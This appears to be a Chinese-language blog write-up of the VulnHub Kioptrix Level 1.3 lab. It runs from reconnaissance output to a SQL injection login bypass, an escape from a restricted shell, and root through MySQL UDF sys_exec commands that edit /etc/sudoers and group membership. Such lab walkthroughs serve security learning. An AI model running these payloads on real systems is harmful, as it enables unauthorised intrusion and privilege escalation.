前置作業
首先,下載下來的靶機缺vmx檔,無法用vmware開啟,乾脆用KIOPTRIX:LEVEL 1.2 (#3)的vmx檔改一改。在解壓縮後的目錄裡,新增Kioptrix4_vmware.vmx,內容如下:
.encoding = "windows-1252"
config.version = "8"
virtualHW.version = "4"
memsize = "512"
MemAllowAutoScaleDown = "FALSE"
displayName = "KioptrixVM3"
guestOS = "other"
ethernet0.addressType = "generated"
ethernet0.connectionType = "nat"
ide0:0.present = "TRUE"
ide0:0.fileName = "Kioptrix4_vmware.vmdk"
ide1:0.present = "TRUE"
ide1:0.autodetect = "TRUE"
ide1:0.filename = "auto detect"
ide1:0.deviceType = "cdrom-raw"
virtualHW.productCompatibility = "hosted"
numa.autosize.cookie = "10001"
numa.autosize.vcpu.maxPerVirtualNode = "1"
uuid.bios = "56 4d ae 69 93 19 55 ff-ec f1 b6 26 b7 b4 17 66"
uuid.location = "56 4d ae 69 93 19 55 ff-ec f1 b6 26 b7 b4 17 66"
ide0:0.redo = ""
svga.vramSize = "134217728"
vmotion.checkpointFBSize = "134217728"
ethernet0.generatedAddressOffset = "0"
monitor.phys_bits_used = "36"
cleanShutdown = "TRUE"
softPowerOff = "FALSE"
tools.syncTime = "FALSE"
ethernet0.present = "TRUE"
ethernet0.generatedAddress = "00:0c:29:b4:17:66"
toolsInstallManager.updateCounter = "1"
checkpoint.vmState = ""
extendedConfigFile = "Kioptrix4_vmware.vmxf"
0x01 信息收集
1.1 namp掃描
掃描開啟port:
$ nmap -A -T4 192.168.44.132
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-24 21:03 CST
Nmap scan report for 192.168.44.132
Host is up (0.00058s latency).
Not shown: 566 closed tcp ports (conn-refused), 430 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_ 2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 9h59m59s, deviation: 2h49m42s, median: 7h59m59s
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Unix (Samba 3.0.28a)
| Computer name: Kioptrix4
| NetBIOS computer name:
| Domain name: localdomain
| FQDN: Kioptrix4.localdomain
|_ System time: 2022-10-24T17:03:39-04:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.87 seconds
Segmentation fault
$ nikto -host 192.168.44.132
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.44.132
+ Target Hostname: 192.168.44.132
+ Target Port: 80
+ Start Time: 2022-10-24 21:09:33 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 98933, size: 5108, mtime: Tue Aug 28 18:48:10 2007
+ OSVDB-3233: /icons/README: Apache default file found.
+ Cookie PHPSESSID created without the httponly flag
+ 8724 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time: 2022-10-24 21:09:45 (GMT8) (12 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
看到是80 port,就先登進網頁。
1.2 目錄遍歷
接下來爆破目錄,用dirb。
$ dirb http://192.168.44.132
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Oct 24 21:46:15 2022
URL_BASE: http://192.168.44.132/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.44.132/ ----
+ http://192.168.44.132/cgi-bin/ (CODE:403|SIZE:329)
==> DIRECTORY: http://192.168.44.132/images/
+ http://192.168.44.132/index (CODE:200|SIZE:1255)
+ http://192.168.44.132/index.php (CODE:200|SIZE:1255)
==> DIRECTORY: http://192.168.44.132/john/
+ http://192.168.44.132/logout (CODE:302|SIZE:0)
+ http://192.168.44.132/member (CODE:302|SIZE:220)
+ http://192.168.44.132/server-status (CODE:403|SIZE:334)
---- Entering directory: http://192.168.44.132/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.44.132/john/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
可以發現有一個john,實際連進去後:
但點john.php後又回到登入畫面,所以先嘗試對登入頁面的帳密用SQL injection攻擊。
0x02 漏洞探測
嘗試一下後,發現如果密碼輸入單引號,會出現如下的sql錯誤:
**Warning**: mysql_num_rows(): supplied argument is not a valid MySQL result resource in **/var/www/checklogin.php** on line **28**
而不只是出現Wrong Username or Password,代表密碼欄位存在SQL injection攻擊漏洞,不過帳號欄位打單引號只會Wrong Username or Password。
帳號用john,密碼則是用 ' or 1=1 #,登入畫面如下:
0x03 Get Shell
既然給出了帳號跟明顯是明文的密碼,就直接SSH登入看看吧。
$ ssh -oHostKeyAlgorithms=+ssh-dss john@192.168.44.132
The authenticity of host '192.168.44.132 (192.168.44.132)' can't be established.
DSA key fingerprint is SHA256:l2Z9xv+mXqcandVHZntyNeV1loP8XoFca+R/2VbroAw.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.44.132' (DSA) to the list of known hosts.
john@192.168.44.132's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don't screw up
Type '?' or 'help' to get the list of allowed commands
如果輸入help指令,可以發現只能使用一些指令:
john:~$ help
cd clear echo exit help ll lpath ls
所以需要讓這個帳號可以用多一點指令,可以參考以下這一篇:
How to Escape Restricted Shell Environments on Linux « Null Byte :: WonderHowTo
總之,因為可以用echo,所以我們使用如下指令使得可以使用大部分指令:
john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$
0x04 提權
提權思路: 1.更改相關文件(\etc\passwd、\etc\sudoer)2.利用現有攻擊腳本3. MySQL提權
如何知道這是MySQL? 剛剛在試SQL injection時,錯誤訊息就已經提示了是MySQL。
不過想利用MySQL提權,首先得知道資料庫帳號密碼。 linux目錄下有個目錄:/var/www/html,把文件放到這個目錄下就可以通過IP很方便的訪問,所以之前懷疑的john.php可能會在裡面。那麼,總之先切換目錄:
john@Kioptrix4:~$ pwd
/home/john
john@Kioptrix4:~$ cd ..
john@Kioptrix4:/home$ cd ..
john@Kioptrix4:/$ pwd
/
john@Kioptrix4:/$ cd /var/www
john@Kioptrix4:/var/www$ ls
checklogin.php database.sql images index.php john login_success.php logout.php member.php robert
john@Kioptrix4:/var/www$ cd john/
john@Kioptrix4:/var/www/john$ ls
john.php
john@Kioptrix4:/var/www/john$ cat john.php
<?php
session_start();
if(!session_is_registered(myusername)){
header("location:../index.php");
}else{
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name
// Connect to server and select databse.
mysql_connect("$host", "$username", "$password")or die("cannot connect");
mysql_select_db("$db_name")or die("cannot select DB");
$result=mysql_query("SELECT * FROM $tbl_name WHERE username='".$_SESSION['myusername']."'");
// Mysql_num_row is counting table row
$count=mysql_num_rows($result);
// If result matched $myusername and $mypassword, table row must be 1 row
if($count!=0){
$row = mysql_fetch_array($result);
}
else {
echo "Something went wrong";
}
ob_end_flush();
?>
<html><body>
<table width="500" border="0" align="center" cellpadding="0" cellspacing="1" bgcolor="#CCCCCC">
<tr>
<td>
<table width="100%" border="0" cellpadding="3" cellspacing="1" bgcolor="#FFFFFF">
<tr>
<td align="center" colspan="3"><strong>Member's Control Panel </strong></td>
</tr>
<tr>
<td width="30">Username</td>
<td width="6">:</td>
<td width="464"><?php print ($row[1]);?></td>
</tr>
<tr>
<td width="30">Password</td>
<td width="6">:</td>
<td width="464"><?php print($row[2]);?></td>
</tr>
<tr>
<td>
<form method="link" action="logout.php">
<input type=submit value="Logout">
</form>
</td>
<td> </td>
</tr>
</table>
</td>
</tr>
</table>
</body></html>
<?php
}
?>
在實際查看了john.php後,可以發現下面兩行:
$username="root"; // Mysql username
$password=""; // Mysql password
這代表root這個user的密碼根本是空的,所以直接用root登入,密碼不用打:
john@Kioptrix4:/var/www/john$ mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 8
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql>
先看看MySQL版本:
mysql> \s
--------------
mysql Ver 14.12 Distrib 5.0.51a, for debian-linux-gnu (i486) using readline 5.2
Connection id: 8
Current database:
Current user: root@localhost
SSL: Not in use
Current pager: stdout
Using outfile: ''
Using delimiter: ;
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)
Protocol version: 10
Connection: Localhost via UNIX socket
Server characterset: latin1
Db characterset: latin1
Client characterset: latin1
Conn. characterset: latin1
UNIX socket: /var/run/mysqld/mysqld.sock
Uptime: 1 hour 22 min 27 sec
Threads: 1 Questions: 38 Slow queries: 0 Opens: 24 Flush tables: 1 Open tables: 18 Queries per second avg: 0.008
--------------
看來是5.0.51a-3ubuntu5.4。
有關資料庫提權,可以看這兩篇:
MySQL提权的三种方法 - FreeBuf网络安全行业门户
【数据库提权系列】---【Mysql-UDF提权篇】 - FreeBuf网络安全行业门户
簡單來說,linux的mysql資料庫可以用sys_eval或sys_exec拿來執行系統指令,但要先連結到UDF库文件(sqlmap-master\data\udf\mysql\linux\64下的lib_mysqludf_sys.so_文件)。
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| members |
| mysql |
+--------------------+
3 rows in set (0.00 sec)
mysql> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> select * from func;
+-----------------------+-----+---------------------+----------+
| name | ret | dl | type |
+-----------------------+-----+---------------------+----------+
| lib_mysqludf_sys_info | 0 | lib_mysqludf_sys.so | function |
| sys_exec | 0 | lib_mysqludf_sys.so | function |
+-----------------------+-----+---------------------+----------+
2 rows in set (0.00 sec)
mysql> select sys_eval("whoami");
ERROR 1305 (42000): FUNCTION mysql.sys_eval does not exist
mysql> SELECT sys_exec('touch /tmp/test_mysql');
+-----------------------------------+
| sys_exec('touch /tmp/test_mysql') |
+-----------------------------------+
| NULL |
+-----------------------------------+
不過從select * from func;這條指令的結果,可以知道已經導入lib_mysqludf_sys.so,所以不需要導入so檔,直接支援sys_exec指令。
為了測試剛剛下的sys_exec指令是否有確實運作,我們實際到tmp資料夾,看看是不是真的有創建文件:
mysql> quit
Bye
john@Kioptrix4:~$ cd /tmp
john@Kioptrix4:/tmp$ ls -l
total 0
-rw-rw---- 1 root root 0 2022-10-29 04:53 test_mysql
可以發現創建出來的文件是root權限 。所以可以利用這樣的函式去更動/etc/sudoers文件,創建一個root使用者robert,或是將john帳號添加權限
創建一個root使用者robert:
select sys_exec('echo "robert ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers');
將john帳號添加權限:
select sys_exec('usermod -a -G admin john');
這裡以第二種方式舉例:
john@Kioptrix4:/tmp$ mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 12
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> use mysql;
No connection. Trying to reconnect...
Connection id: 1
Current database: *** NONE ***
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> select sys_exec('usermod -a -G admin john');
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
Connection id: 1
Current database: mysql
+--------------------------------------+
| sys_exec('usermod -a -G admin john') |
+--------------------------------------+
| NULL |
+--------------------------------------+
1 row in set (0.05 sec)
再新開一個cmd測試:
$ ssh -oHostKeyAlgorithms=+ssh-dss john@192.168.44.132
john@192.168.44.132's password:
Permission denied, please try again.
john@192.168.44.132's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ echo os.system('/bin/bash')
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
john@Kioptrix4:~$ sudo su
[sudo] password for john:
root@Kioptrix4:/home/john#
找flag:
root@Kioptrix4:~# locate root
/root
/etc/init.d/checkroot.sh
/etc/init.d/umountroot
/etc/rc0.d/S60umountroot
/etc/rc6.d/S60umountroot
/etc/rcS.d/S20checkroot.sh
/lib/security/pam_rootok.so
/root/.bash_history
/root/.bashrc
/root/.lhistory
/root/.mysql_history
/root/.nano_history
/root/.profile
/root/.ssh
/root/congrats.txt
/root/lshell-0.9.12
/root/.ssh/known_hosts
/root/lshell-0.9.12/CHANGES
/root/lshell-0.9.12/COPYING
/root/lshell-0.9.12/MANIFEST.in
/root/lshell-0.9.12/PKG-INFO
/root/lshell-0.9.12/README
/root/lshell-0.9.12/bin
/root/lshell-0.9.12/build
/root/lshell-0.9.12/etc
/root/lshell-0.9.12/lshell.spec
/root/lshell-0.9.12/lshellmodule
/root/lshell-0.9.12/man
/root/lshell-0.9.12/setup.py
/root/lshell-0.9.12/test
/root/lshell-0.9.12/bin/lshell
/root/lshell-0.9.12/build/lib
/root/lshell-0.9.12/build/scripts-2.5
/root/lshell-0.9.12/build/lib/lshell.py
/root/lshell-0.9.12/build/scripts-2.5/lshell
/root/lshell-0.9.12/etc/logrotate.d
/root/lshell-0.9.12/etc/lshell.conf
/root/lshell-0.9.12/etc/logrotate.d/lshell
/root/lshell-0.9.12/lshellmodule/lshell.py
/root/lshell-0.9.12/man/lshell.1
/root/lshell-0.9.12/test/test_lshell.py
/sbin/pivot_root
/usr/lib/klibc/bin/chroot
/usr/lib/klibc/bin/pivot_root
/usr/sbin/chroot
/usr/sbin/rootflags
/usr/share/man/man8/chroot.8.gz
/usr/share/man/man8/pam_rootok.8.gz
/usr/share/man/man8/pivot_root.8.gz
/usr/share/man/man8/rootflags.8.gz
/usr/share/man/man8/sudo_root.8.gz
/usr/share/mysql/mysql-test/include/not_as_root.inc
/usr/share/mysql/mysql-test/r/not_as_root.require
/usr/share/recovery-mode/options/root
/var/log/fsck/checkroot
flag的路徑是: /root/congrats.txt。
Reference
MySQL提权的三种方法 - FreeBuf网络安全行业门户
【数据库提权系列】---【Mysql-UDF提权篇】 - FreeBuf网络安全行业门户
https://lonelysec.com/vulnhub-x-kioptrix-level-1-3-4/
[資訊安全] VulnHub – Kioptrix Level 1.3 (#4) Write-up - MkS
Bernardo Dag: Command execution with a MySQL UDF
vulnhub-serial靶机缺.vmx文件解决方法_zonei123的博客-CSDN博客
How to Escape Restricted Shell Environments on Linux « Null Byte :: WonderHowTo
_@humorless_https://static.coderbridge.com/images/covers/default-post-cover-1.jpg)
